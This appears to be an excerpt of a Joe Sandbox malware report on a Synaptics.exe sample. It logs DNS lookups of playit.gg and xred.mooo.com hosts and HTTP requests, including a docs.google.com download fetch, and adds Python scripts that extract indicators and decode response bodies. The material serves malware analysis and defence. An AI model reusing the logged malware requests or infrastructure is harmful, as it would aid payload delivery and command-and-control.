| Jan 26, 2022 02:40:49.421572924 CET | 192.168.2.3 | 8.8.8.8 | 0xd3e5 | Standard query (0) | chivalrous-condition.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:53.687092066 CET | 192.168.2.3 | 8.8.8.8 | 0x5937 | Standard query (0) | chivalrous-condition.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:54.512151957 CET | 192.168.2.3 | 8.8.8.8 | 0x435b | Standard query (0) | agonizing-bat.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:59.748697996 CET | 192.168.2.3 | 8.8.8.8 | 0x35fd | Standard query (0) | agonizing-bat.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:04.912168980 CET | 192.168.2.3 | 8.8.8.8 | 0xf014 | Standard query (0) | agonizing-bat.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:13.503853083 CET | 192.168.2.3 | 8.8.8.8 | 0xb176 | Standard query (0) | chivalrous-condition.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:17.889431000 CET | 192.168.2.3 | 8.8.8.8 | 0x8af5 | Standard query (0) | chivalrous-condition.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:22.367238998 CET | 192.168.2.3 | 8.8.8.8 | 0xa89 | Standard query (0) | chivalrous-condition.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:24.376039982 CET | 192.168.2.3 | 8.8.8.8 | 0xc3f9 | Standard query (0) | agonizing-bat.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:36.859237909 CET | 192.168.2.3 | 8.8.8.8 | 0xf8be | Standard query (0) | agonizing-bat.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:42.306711912 CET | 192.168.2.3 | 8.8.8.8 | 0x35b1 | Standard query (0) | chivalrous-condition.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:46.931000948 CET | 192.168.2.3 | 8.8.8.8 | 0xec9a | Standard query (0) | chivalrous-condition.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:48.023952961 CET | 192.168.2.3 | 8.8.8.8 | 0x4ed3 | Standard query (0) | agonizing-bat.auto.playit.gg | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:51.133140087 CET | 192.168.2.3 | 8.8.8.8 | 0xa6c6 | Standard query (0) | chivalrous-condition.auto.playit.gg | A (IP address) | IN (0x0001) |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Jan 26, 2022 02:40:06.367955923 CET | 8.8.8.8 | 192.168.2.3 | 0x7501 | No error (0) | agonizing-bat.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:40:06.367955923 CET | 8.8.8.8 | 192.168.2.3 | 0x7501 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:15.250360966 CET | 8.8.8.8 | 192.168.2.3 | 0x7c84 | No error (0) | chivalrous-condition.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:40:15.250360966 CET | 8.8.8.8 | 192.168.2.3 | 0x7c84 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:17.975477934 CET | 8.8.8.8 | 192.168.2.3 | 0x6f61 | No error (0) | agonizing-bat.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:40:17.975477934 CET | 8.8.8.8 | 192.168.2.3 | 0x6f61 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:20.866235971 CET | 8.8.8.8 | 192.168.2.3 | 0x31d5 | No error (0) | chivalrous-condition.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:40:20.866235971 CET | 8.8.8.8 | 192.168.2.3 | 0x31d5 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:25.374995947 CET | 8.8.8.8 | 192.168.2.3 | 0xc927 | No error (0) | chivalrous-condition.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:40:25.374995947 CET | 8.8.8.8 | 192.168.2.3 | 0xc927 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:31.250781059 CET | 8.8.8.8 | 192.168.2.3 | 0x4285 | No error (0) | agonizing-bat.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:40:31.250781059 CET | 8.8.8.8 | 192.168.2.3 | 0x4285 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:37.615461111 CET | 8.8.8.8 | 192.168.2.3 | 0x93b6 | No error (0) | agonizing-bat.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:40:37.615461111 CET | 8.8.8.8 | 192.168.2.3 | 0x93b6 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:40.699500084 CET | 8.8.8.8 | 192.168.2.3 | 0x985e | No error (0) | docs.google.com | | 142.250.186.46 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:41.345874071 CET | 8.8.8.8 | 192.168.2.3 | 0xfa1b | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:41.565371037 CET | 8.8.8.8 | 192.168.2.3 | 0xb07a | No error (0) | freedns.afraid.org | | 69.42.215.252 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:44.085745096 CET | 8.8.8.8 | 192.168.2.3 | 0xa0d2 | No error (0) | agonizing-bat.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:40:44.085745096 CET | 8.8.8.8 | 192.168.2.3 | 0xa0d2 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:45.256189108 CET | 8.8.8.8 | 192.168.2.3 | 0x2fa6 | No error (0) | chivalrous-condition.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:40:45.256189108 CET | 8.8.8.8 | 192.168.2.3 | 0x2fa6 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:49.398410082 CET | 8.8.8.8 | 192.168.2.3 | 0xc17 | No error (0) | agonizing-bat.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:40:49.398410082 CET | 8.8.8.8 | 192.168.2.3 | 0xc17 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:49.523896933 CET | 8.8.8.8 | 192.168.2.3 | 0xd3e5 | No error (0) | chivalrous-condition.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:40:49.523896933 CET | 8.8.8.8 | 192.168.2.3 | 0xd3e5 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:53.792155981 CET | 8.8.8.8 | 192.168.2.3 | 0x5937 | No error (0) | chivalrous-condition.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:40:53.792155981 CET | 8.8.8.8 | 192.168.2.3 | 0x5937 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:54.614680052 CET | 8.8.8.8 | 192.168.2.3 | 0x435b | No error (0) | agonizing-bat.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:40:54.614680052 CET | 8.8.8.8 | 192.168.2.3 | 0x435b | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:40:59.767992973 CET | 8.8.8.8 | 192.168.2.3 | 0x35fd | No error (0) | agonizing-bat.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:40:59.767992973 CET | 8.8.8.8 | 192.168.2.3 | 0x35fd | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:04.932037115 CET | 8.8.8.8 | 192.168.2.3 | 0xf014 | No error (0) | agonizing-bat.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:41:04.932037115 CET | 8.8.8.8 | 192.168.2.3 | 0xf014 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:13.523139000 CET | 8.8.8.8 | 192.168.2.3 | 0xb176 | No error (0) | chivalrous-condition.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:41:13.523139000 CET | 8.8.8.8 | 192.168.2.3 | 0xb176 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:17.909354925 CET | 8.8.8.8 | 192.168.2.3 | 0x8af5 | No error (0) | chivalrous-condition.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:41:17.909354925 CET | 8.8.8.8 | 192.168.2.3 | 0x8af5 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:22.384677887 CET | 8.8.8.8 | 192.168.2.3 | 0xa89 | No error (0) | chivalrous-condition.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:41:22.384677887 CET | 8.8.8.8 | 192.168.2.3 | 0xa89 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:24.393465042 CET | 8.8.8.8 | 192.168.2.3 | 0xc3f9 | No error (0) | agonizing-bat.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:41:24.393465042 CET | 8.8.8.8 | 192.168.2.3 | 0xc3f9 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:36.878462076 CET | 8.8.8.8 | 192.168.2.3 | 0xf8be | No error (0) | agonizing-bat.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:41:36.878462076 CET | 8.8.8.8 | 192.168.2.3 | 0xf8be | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:42.420746088 CET | 8.8.8.8 | 192.168.2.3 | 0x35b1 | No error (0) | chivalrous-condition.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:41:42.420746088 CET | 8.8.8.8 | 192.168.2.3 | 0x35b1 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:47.032968044 CET | 8.8.8.8 | 192.168.2.3 | 0xec9a | No error (0) | chivalrous-condition.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:41:47.032968044 CET | 8.8.8.8 | 192.168.2.3 | 0xec9a | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:48.043034077 CET | 8.8.8.8 | 192.168.2.3 | 0x4ed3 | No error (0) | agonizing-bat.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:41:48.043034077 CET | 8.8.8.8 | 192.168.2.3 | 0x4ed3 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
| Jan 26, 2022 02:41:51.150513887 CET | 8.8.8.8 | 192.168.2.3 | 0xa6c6 | No error (0) | chivalrous-condition.auto.playit.gg | saw4.playit.gg | | CNAME (Canonical name) | IN (0x0001) |
| Jan 26, 2022 02:41:51.150513887 CET | 8.8.8.8 | 192.168.2.3 | 0xa6c6 | No error (0) | saw4.playit.gg | | 54.38.136.57 | A (IP address) | IN (0x0001) |
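In the extracted report the DNS cells run together, so the source and destination addresses ("8.8.8.8192.168.2.3") and the Name and CName cells ("agonizing-bat.auto.playit.ggsaw4.playit.gg") are ambiguous to split by eye. The following is an added example and is not part of the Joe Sandbox report or of the sample's code: it parses rows in exactly that flattened form back into fields and reduces them to the indicators an analyst wants, the final address behind each CNAME chain and the names that returned NXDOMAIN. Its one assumption is that 192.168.2.3 is the analysis host, as the report shows; that is what disambiguates the IP split. The sample rows are copied from the two tables above.

```python
"""Parse the flattened Joe Sandbox DNS rows above and pull out the IOCs.

Added example: not from the report or the sample. ROWS are copied from the
report's query/answer tables (HTML cells run together by text extraction).
ANALYSIS_HOST is the sandbox VM address shown in the report and is the one
assumption used to cut the concatenated Source IP / Dest IP cells apart.
"""
import ipaddress
import re
from collections import defaultdict

ANALYSIS_HOST = "192.168.2.3"

# Timestamp | SrcIP+DstIP | Trans ID | code | Name[+CName | +Address | +"nonenone"] | Type | Class
ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]+)"
    r"(?P<ips>[\d.]+)(?P<tid>0x[0-9a-fA-F]+)"
    r"(?P<code>Standard query \(\d+\)|No error \(\d+\)|Name error \(\d+\))"
    r"(?P<names>.*?)(?P<rtype>A \(IP address\)|CNAME \(Canonical name\))IN \(0x0001\)$"
)
NAME_THEN_IPV4 = re.compile(r"^(?P<name>.*?)(?P<ip>(?:\d{1,3}\.){3}\d{1,3})$")


def split_ip_pair(blob):
    """'8.8.8.8192.168.2.3' -> ('8.8.8.8', '192.168.2.3'). The cut is ambiguous on
    its own (8.8.8.81 + 92.168.2.3 also parses), so keep the cut with the sandbox host."""
    for cut in range(1, len(blob)):
        left, right = blob[:cut], blob[cut:]
        try:
            ipaddress.IPv4Address(left), ipaddress.IPv4Address(right)
        except ValueError:
            continue
        if ANALYSIS_HOST in (left, right):
            return left, right
    raise ValueError("cannot split IP pair %r" % blob)


def parse_row(line, queried):
    """Parse one row. `queried` (Trans ID -> name) is filled from query rows;
    a CNAME answer needs it to cut the run-together 'name+cname' cell."""
    m = ROW_RE.match(line.strip())
    if not m:
        raise ValueError("unrecognised row %r" % line)
    src, dst = split_ip_pair(m["ips"])
    rec = {"ts": m["ts"], "src": src, "dst": dst, "tid": m["tid"].lower(),
           "code": m["code"], "rtype": m["rtype"].split()[0],
           "name": None, "cname": None, "address": None}
    names = m["names"]
    if rec["code"].startswith("Standard query"):
        rec["name"] = names
        queried[rec["tid"]] = names
    elif names.endswith("nonenone"):           # NXDOMAIN: CName and Address cells read "none"
        rec["name"] = names[:-len("nonenone")]
    elif rec["rtype"] == "CNAME":              # cells are Name then CName; cut at the queried name
        qname = queried.get(rec["tid"], "")
        cut = qname and names.startswith(qname)
        rec["name"], rec["cname"] = (qname, names[len(qname):]) if cut else (names, None)
    else:                                      # A: hostname immediately followed by the IPv4 address
        am = NAME_THEN_IPV4.match(names)
        rec["name"], rec["address"] = (am["name"], am["ip"]) if am else (names, None)
    return rec


def summarize(rows):
    """Resolution map, CNAME aliases and NXDOMAIN names from a list of rows."""
    queried, resolved, aliases, nxdomain = {}, defaultdict(set), {}, set()
    for line in rows:
        r = parse_row(line, queried)
        if r["code"].startswith("Name error"):
            nxdomain.add(r["name"])
        elif r["cname"]:
            aliases[r["name"]] = r["cname"]
        elif r["address"]:
            resolved[r["name"]].add(r["address"])
    return {"resolved": {k: sorted(v) for k, v in resolved.items()},
            "aliases": aliases, "nxdomain": sorted(nxdomain)}


def resolve(summary, name, seen=()):
    """Follow CNAME aliases to the addresses finally recorded for `name`."""
    if name in seen:                           # alias loop guard
        return []
    target = summary["aliases"].get(name)
    return resolve(summary, target, seen + (name,)) if target else summary["resolved"].get(name, [])


ROWS = [  # copied from the report; queries first, so CNAME answers can be cut
    "Jan 26, 2022 02:40:31.133385897 CET192.168.2.38.8.8.80x4285Standard query (0)agonizing-bat.auto.playit.ggA (IP address)IN (0x0001)",
    "Jan 26, 2022 02:40:40.671993017 CET192.168.2.38.8.8.80x985eStandard query (0)docs.google.comA (IP address)IN (0x0001)",
    "Jan 26, 2022 02:40:41.326347113 CET192.168.2.38.8.8.80xfa1bStandard query (0)xred.mooo.comA (IP address)IN (0x0001)",
    "Jan 26, 2022 02:40:45.236999989 CET192.168.2.38.8.8.80x2fa6Standard query (0)chivalrous-condition.auto.playit.ggA (IP address)IN (0x0001)",
    "Jan 26, 2022 02:40:31.250781059 CET8.8.8.8192.168.2.30x4285No error (0)agonizing-bat.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)",
    "Jan 26, 2022 02:40:31.250781059 CET8.8.8.8192.168.2.30x4285No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)",
    "Jan 26, 2022 02:40:40.699500084 CET8.8.8.8192.168.2.30x985eNo error (0)docs.google.com142.250.186.46A (IP address)IN (0x0001)",
    "Jan 26, 2022 02:40:41.345874071 CET8.8.8.8192.168.2.30xfa1bName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)",
    "Jan 26, 2022 02:40:45.256189108 CET8.8.8.8192.168.2.30x2fa6No error (0)chivalrous-condition.auto.playit.ggsaw4.playit.ggCNAME (Canonical name)IN (0x0001)",
    "Jan 26, 2022 02:40:45.256189108 CET8.8.8.8192.168.2.30x2fa6No error (0)saw4.playit.gg54.38.136.57A (IP address)IN (0x0001)",
]
SUMMARY = summarize(ROWS)

if __name__ == "__main__":
    for host in sorted(set(SUMMARY["aliases"]) | set(SUMMARY["resolved"])):
        print("%-40s -> %s" % (host, ", ".join(resolve(SUMMARY, host))))
    print("NXDOMAIN:", ", ".join(SUMMARY["nxdomain"]))
```

Run over the rows above, both playit.gg names the sample keeps querying alias to saw4.playit.gg, which resolved to 54.38.136.57, so one address covers both hostnames for blocking; xred.mooo.com returned Name error (3) and has to be tracked as a domain indicator without an address. The ordering matters: a CNAME answer can only be cut at the queried name if the query row with the same transaction ID was parsed first, which is how the report lays the tables out.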
                                                  • docs.google.com
                                                  • freedns.afraid.org
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.2.3 | 49765 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |
| 1 | 192.168.2.3 | 49766 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |
| 10 | 192.168.2.3 | 49779 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |
| 11 | 192.168.2.3 | 49778 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |
| 12 | 192.168.2.3 | 49780 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |
| 13 | 192.168.2.3 | 49781 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |

Timestamp | kBytes transferred | Direction | Data
(no HTTP data recorded for sessions 0, 1, 10, 11, 12 and 13)


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 14 | 192.168.2.3 | 49768 | 69.42.215.252 | 80 | C:\ProgramData\Synaptics\Synaptics.exe |

Timestamp | kBytes transferred | Direction | Data
Jan 26, 2022 02:40:41.833442926 CET | 1317 kB | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
User-Agent: MyApp
Host: freedns.afraid.org
Cache-Control: no-cache
Jan 26, 2022 02:40:42.046803951 CET | 1319 kB | IN | HTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Wed, 26 Jan 2022 01:40:39 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  Vary: Accept-Encoding
                                                  X-Cache: MISS
                                                  Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 1fERROR: Could not authenticate.0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 2 | 192.168.2.3 | 49771 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |
| 3 | 192.168.2.3 | 49770 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |
| 4 | 192.168.2.3 | 49773 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |
| 5 | 192.168.2.3 | 49772 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |
| 6 | 192.168.2.3 | 49774 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |
| 7 | 192.168.2.3 | 49775 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |
| 8 | 192.168.2.3 | 49777 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |
| 9 | 192.168.2.3 | 49776 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |

Timestamp | kBytes transferred | Direction | Data
(no HTTP data recorded for sessions 2 to 9)

| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.2.3 | 49765 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |

Timestamp | kBytes transferred | Direction | Data
2022-01-26 01:40:41 UTC | 0 kB | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
2022-01-26 01:40:42 UTC | 0 kB | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Content-Security-Policy: script-src 'nonce-h8PmNUY3Lxp2hZQHX+d9yQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Date: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=SSVn4-j59JXsTzxw847lfqJIID7zKof-Xkcxy3fnYPbOQF2K_rhItUDKpUam4CimsZa0ZkCNsNF-p5jihI9D9v5_JpNDmEeXc8nvpPuWdC1Y-5-xdpfIrOe7Xgo8_7k6NVyKXkeYW_T_LgorYz9SrXu0RFiFNl_tuUgPHfJZcdM; expires=Thu, 28-Jul-2022 01:40:41 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
2022-01-26 01:40:42 UTC | 1 kB | IN | Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
2022-01-26 01:40:42 UTC | 1 kB | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
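Joe Sandbox shows each response body as a "Data Raw" hex dump next to a printable "Data Ascii" view with the control characters dropped, which is why the chunk framing of these chunked responses ("1f", "8d", the trailing "0") shows up as stray digits in the ASCII, and why the Google body is spread over two Data Raw rows. The following is an added example, not from the report or from the sample: it rejoins the Data Raw rows of a session, decodes the chunked transfer encoding to recover the real bodies of the freedns.afraid.org reply (session 14) and the docs.google.com 404 (session 0 above), and parses the two request lines into their query parameters. The hex strings and request lines are copied from the report; nothing else is assumed.

```python
"""Recover the HTTP bodies from the 'Data Raw' hex cells of the sessions above.

Added example: not from the report or the sample. Both responses carry
Transfer-Encoding: chunked, so the bytes on the wire are
"<hex size>\\r\\n<data>\\r\\n ... 0\\r\\n\\r\\n" (RFC 7230 section 4.1), and
Joe Sandbox splits one body over several 'Data Raw' rows (the Google 404 ends
in a separate "30 0d 0a 0d 0a" row). Hex and request lines are copied from the
report rows.
"""
from urllib.parse import parse_qs, urlsplit

# Session 14 (freedns.afraid.org, port 80): one 'Data Raw' row.
FREEDNS_RAW = [
    "31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a",
]
# Session 0 (docs.google.com, port 443, decrypted by the sandbox): two 'Data Raw' rows.
GOOGLE_RAW = [
    "38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 "
    "3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 "
    "46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 "
    "6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e "
    "0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a",
    "30 0d 0a 0d 0a",
]
FREEDNS_REQUEST = "GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1"
GOOGLE_REQUEST = "GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1"


def raw_rows_to_bytes(rows):
    """Join the 'Data Raw' cells of one direction of a session into one byte stream."""
    return b"".join(bytes.fromhex(cell) for cell in rows)


def dechunk(stream):
    """Decode a chunked body. Returns (body, bytes left after the terminating empty
    line). Raises ValueError on a truncated stream, which is what a capture that
    was cut off mid-transfer looks like."""
    body, pos = bytearray(), 0
    while True:
        eol = stream.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated chunk-size line")
        size = int(stream[pos:eol].split(b";", 1)[0].strip(), 16)   # drop chunk extensions
        pos = eol + 2
        if size == 0:                       # last-chunk: optional trailers, then an empty line
            end = stream.find(b"\r\n\r\n", pos - 2)
            if end < 0:
                raise ValueError("truncated trailer section")
            return bytes(body), stream[end + 4:]
        if len(stream) < pos + size + 2 or stream[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated or malformed chunk of %d bytes" % size)
        body += stream[pos:pos + size]
        pos += size + 2


def parse_request_line(line):
    """'GET /api/?action=getdyndns&sha=... HTTP/1.1' -> (method, path, {param: [values]})."""
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    return method, parts.path, parse_qs(parts.query)


if __name__ == "__main__":
    for label, raw, req in (("freedns", FREEDNS_RAW, FREEDNS_REQUEST),
                            ("google", GOOGLE_RAW, GOOGLE_REQUEST)):
        body, _rest = dechunk(raw_rows_to_bytes(raw))
        print(label, parse_request_line(req)[1:], "->", len(body), "bytes:", body.decode()[:40].rstrip())
```

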